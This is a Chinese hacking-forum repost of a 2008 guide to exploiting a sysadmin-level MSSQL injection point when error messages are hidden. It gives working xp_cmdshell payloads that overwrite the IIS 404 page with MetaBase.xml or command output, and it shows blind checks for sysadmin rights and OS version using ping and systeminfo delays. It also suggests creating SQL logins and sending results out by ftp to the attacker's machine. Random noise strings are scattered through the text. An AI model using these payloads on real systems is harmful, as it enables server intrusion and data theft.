遇到一个sa注入点,mssql错误提示关闭无疑shi让人郁闷的事情。
( {/ i+ t; U4 s5 r4 E6 o
4 v' K% O8 M0 V* [1 K4 G$ {: O 虽然错误提示关闭也shi可能以列目录,执行命令,但shishi多少就有些不方便。阿D就可能以在错误提示关闭的情况下列目录。, F9 j2 w: f2 e8 W3 K# ]
# \/ `* ^' m. A: l% E5 s6 J 这里有一个很好的方法,让你得到web目录路径,让你得到服务器上的文件,让你执行命令得到回显。0 u: `% l# [. b% O) F% w8 C5 s. Z( o
7 O5 z% N, a# F0 W
IIS,404页面的默认路径shi C:\Windows\Help\iisHelp\common\404b.htm
( ]- I% G( y- ^8 `, g
- @7 h$ R) L* K g+ h 得到web路径exec master..xp_cmdshell ’copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm’--
: J6 X% a4 U3 l) ~/ n- _4 z3 S4 F! W/ x1 s
,这shi20003,如果是2000的话,exec master..xp_cmdshell ’copy C:\Winnt\system32 \inetsrv\MetaBase.xml C:\Winnts\Help\iisHelp\common\404b.htm’--,在 MetaBase.xml存着IIS的很多信息。执行上面的语句之后,你再访问一下网站一个不存在的文件或目录,显示的就shiMetaBase.xml 的内容了。' Z0 T$ S6 i. T+ u- g# Z* e* ~( J* k/ T3 M
# {: J# M' ]! g7 X7 ~ 执行命令得到回显
/ ~# O3 R6 A3 y0 ]/ |
# e8 \. _& L6 l1 r) l5 B) B- D0 j 通过上面得到web路径的方法,你肯定很容易想到怎么得到回显了吧。 2003,exec master..xp_cmdshell ’ver >C:\Windows\Help\iisHelp\common \404b.htm’--如果是2000,exec master..xp_cmdshell ’ver >C:\Winnt\Help \iisHelp\common\404b.htm’--
1 N0 A% s. G5 u4 i+ ?
2 v; C2 s0 ~0 r4 q+ c& ` 得到文件也shi相同,把文件copy到404b.htm就行了
3 Z2 Q" t) I8 |4 Q' w8 H' G
' g& g: L! i/ F; @5 K0 r by 28ice, 2008/6/26
- I J2 A, q" L% ^% k; c9 [& q0 {1 n
摘自 28度的冰$ O" R; k2 R! u! e1 A; @
" z. ?8 J2 Z4 V/ c- a 盲注判断权限和操作系统版本
3 y+ ?# }* p+ ~! d7 o% b7 l; E9 n/ h1 v2 G
首先第一个问题,如果错误提示关闭,怎么判断当前的权限shi否为sysadmin呢?( j s4 A9 A- F
$ v, I2 @% G! a 最简单的,可能以用这样的方法:: R+ m# k1 Q" d# A3 T% U Q } r
+ F+ r q4 m7 g& F7 I0 v
1=(select IS_SRVROLEMEMBER(’sysadmin’))
. z+ N% X8 N& D! [% X9 V, |9 w
2 M* s% H7 X/ Q& n! v! V 当然,有些情况下,这个方法并不奏效。
. s' z1 v5 M0 Y1 A/ z
& z9 x1 u7 J7 b' |8 z 既然shisa,我们就可能以通过执行命令判断,不过,既然错误提示关闭,那么执行的结果就很不容易拿到。8 d. o% L) T! }/ X# D. }. q; L
- j) s; e$ ^, {& b$ K, [; `$ X 有个3办法可能以解决这个问题
1 f0 ^9 C/ [' j( n1 {+ u1 ^& v
! y5 e6 w% D- \8 S5 M4 I! d a.把执行结果写到404b.htm,具体请看我的上一篇文章. D$ z0 e0 C; }' O- H& B4 t
! E$ [# Y" y- ]4 e b.执行ping 127.1 -n 10,看看页面shi否延迟10秒钟; W+ J2 @" [- Y9 w1 Z; ~
3 v7 n+ |0 Q6 ^7 q9 O! a c.如果1433端口可能以连接,那干脆新建个sql登录( N) M! R* J: z6 K9 [' A- {
. C! L8 N1 }5 ]- ~, t# b0 k9 R& s5 j d.如果大牛你shi公网Ip,openrowset,或者直接telnet,ftp到你自己的机子,说到这里,ftp还有别的用处,比如,把执行结果写到文件中,然后通过ftp传到你的机子上,这何尝不shi获得执行结果的一个好办法。当然,你可能能要用到ftp的-s参数
, Q8 f5 n6 K, O. b4 N/ ?) s# { F6 ]* x2 d+ y
还有一个问题,怎么判断系统shi2000还shi2003?当然指的shi错误提示关闭的情况下2 r, A/ a/ r; _. c: X. ~" S' M. ^
5 O: m' L9 c1 B. [8 G+ [2 O6 E 很简单
; q, |! h& w8 {, t+ l, \ c$ `( U) t/ J2 _/ I* i I& Z
执行systeminfo" k2 ` Z+ y( S
% Z8 u7 c8 Z# ]* T4 @: N4 W 在xp/2003下才有这个命令,这个命令执行大概需要5秒钟时间。如果页面延迟5秒,就可能以进一步断定这shi2003(当然不排除2008的可能能性)。 |
发表于 2012-9-15 14:15:42
收藏
支持
反对